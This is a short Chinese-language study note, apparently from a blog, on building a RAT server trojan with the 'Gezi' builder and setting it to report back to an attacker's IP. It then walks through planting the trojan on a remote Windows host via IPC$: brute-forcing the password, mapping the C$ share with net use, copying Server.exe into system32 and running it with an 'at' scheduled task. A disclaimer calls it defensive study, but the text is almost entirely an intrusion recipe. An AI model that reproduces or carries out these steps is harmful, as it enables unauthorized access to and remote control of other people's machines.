【笔记】鸽子牧民战天学习笔记

前言

通过鸽子牧民战天制作服务器木马,并通过IPC$漏洞进行远程执行

本文仅用于网络信息防御学习

制作木马

  • 打开程序->配置服务程序

  • 安装选项配置木马在服务器安装的配置

  • 启动项设置配置木马在服务器的自启动服务

  • 自动上线设置配置攻击者的IP地址和木马在本地的保存路径->点击生成服务器生成木马

远程执行木马

使用IPC$漏洞将服务器的共享文件夹映射在本地

  • 首先要通过暴力破解出服务器的Windows密码

<username>:用户名
<password>:密码

1
net use \\192.168.1.1\c$ <password> /user:<username>

将木马上传到服务器

d:\Server:木马在本地存放的位置
\\192.168.1.1\c$\windows\system32:上传到服务器的位置

1
copy d:\Server.exe \\192.168.1.1\c$\windows\system32

通过为服务器添加计划任务达到远程执行木马

<time>:执行时间,格式HH:mm(最好在3分钟开外,防止系统误差,判定为第二天)

1
at \\192.168.1.1 <time> "c:\windows\system32\Server.exe"

查看远端计划任务列表

1
at \\192.168.1.1

完成

参考文献

哔哩哔哩——千锋教育网络安全学院